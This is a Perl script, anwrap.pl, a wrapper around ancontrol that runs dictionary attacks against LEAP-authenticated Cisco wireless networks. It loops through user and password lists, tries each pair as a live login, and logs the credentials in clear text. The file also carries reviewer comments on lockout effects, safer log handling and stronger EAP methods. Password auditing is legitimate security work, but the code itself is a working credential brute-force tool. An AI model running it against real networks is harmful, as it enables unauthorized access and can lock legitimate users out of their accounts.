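#!/usr/bin/perl
#
# Version 0.1
# anwrap.pl is a wrapper for ancontrol that serves as a Dictionary
# attack tool against LEAP enabled Cisco Wireless Networks. Traverses
# a user list and password list attempting authentication and logging the
# results to a file. Really wreaks havoc on RADIUS calls to NT Networks that
# have lockout policies in place, you have been warned. Tweak the Timeouts,
# a lengthy LEAP timeout on the Cisco side could make for a very boring afternoon.
# This tool was designed to audit authentication strengths before deploying LEAP in
# a production environment.
#
# Needs ancontrol and some Perl stuff, hit up CPAN until the errors go away.
# Tested on FreeBSD 4.7.
#
# General Usage : $0 <userfile> <passwordfile> <logfile>
#
# Brian Barto < brian@bartosoft.com > and Ron Sweeney < sween@modelm.org >
# November 2K02
#
# http://www.modelm.org/anwrap/
#
# Review notes:
#   * Every guess is a live authentication that reaches the RADIUS backend,
#     so on the defending side a run shows up as a series of failed logins
#     for many accounts from a single wireless client, and it counts against
#     account lockout thresholds (the authors' warning above).
#   * The log file records each username/password pair in clear text,
#     including the ones that worked.  It is created owner-only below and
#     should be handled as credential material.
#   * The script only measures password strength.  If accounts fall to the
#     word list, the remedy is stronger passwords or, better, moving to an
#     EAP method that does not rest on password strength alone (EAP-TLS,
#     PEAP, EAP-FAST).
#

use strict;
use warnings;

use Expect ();

# Seconds to wait for ancontrol's password prompt and for the result text.
# These are the "Timeouts" the header says to tweak.
my $PROMPT_TIMEOUT = 5;
my $AUTH_TIMEOUT   = 10;

# All three file arguments are required.  The original only checked for
# zero arguments and then ran with undefined file names.
usage() if @ARGV < 3;

my ($userfile, $passfile, $logfile) = @ARGV;

my @passwords = read_list($passfile, 'password');
my @users     = grep { length } read_list($userfile, 'user');

# With an empty password list the original loop never reached its end
# condition and spun forever; stop early instead.
die "password file $passfile is empty\n" unless @passwords;

# The log holds clear-text credentials, so create it readable by the owner
# only.  The previous umask is restored so ancontrol is not affected.
my $old_umask = umask 077;
append_log($logfile, "\n\nScript started at ", scalar(localtime), " \n\n");
umask $old_umask;

USER:
for my $user (@users) {
    for my $pass (@passwords) {
        # Kept from the original; presumably meant to switch off input
        # record splitting while Expect is running -- TODO confirm it is
        # still needed.
        local $/;

        # List form: the user name is passed as a single argument and is
        # never interpreted by a shell, whatever characters the user file
        # contains.
        my $p = Expect->spawn('ancontrol', '-L', $user)
            or die "can't spawn ancontrol: $!\n";

        $p->expect($PROMPT_TIMEOUT, "assw") || die "Never recieved LEAP password";
        print {$p} "$pass\r";
        print $pass, "\n";

        # NOTE(review): success is a substring match on "uth" in
        # ancontrol's output.  Confirm against the real output that a
        # failure message cannot contain it too, or the audit log will
        # report false positives.
        my $authenticated = $p->expect($AUTH_TIMEOUT, "uth");

        if ($authenticated) {
            print "Success!\n";
            append_log($logfile, "User: $user Password: $pass SUCCESS! ", "\n");
        }
        else {
            print "Failed\n";
            append_log($logfile, "User: $user Password: $pass FAILED! ", "\n");
        }

        $p->close();

        # Stop trying passwords for this account once one has worked.
        next USER if $authenticated;
    }
}

# Read a word list and return its lines without line endings.
# chomp (not chop) keeps the final entry intact when the file has no
# trailing newline; a trailing CR from DOS-style files is dropped as well.
sub read_list {
    my ($path, $label) = @_;

    open(my $fh, '<', $path)
        or die "can't open $label file, $path: $!\n";
    my @entries = <$fh>;
    close($fh);

    chomp @entries;
    s/\r\z// for @entries;

    return @entries;
}

# Append the given strings to the log file.  The file is reopened for
# every write, as in the original, so each result is on disk before the
# next attempt starts.
sub append_log {
    my ($path, @text) = @_;

    open(my $fh, '>>', $path)
        or die "can't open log file, $path: $!\n";
    print {$fh} @text;
    close($fh)
        or die "can't write log file, $path: $!\n";

    return;
}

# Print the command-line synopsis and exit.
sub usage {
    print "\nUsage : $0 <userfile> <passwordfile> <logfile>\n\n";
    print "Ron Sweeney \n";
    print "Brian Barto \n\n\n\n";
    exit;
}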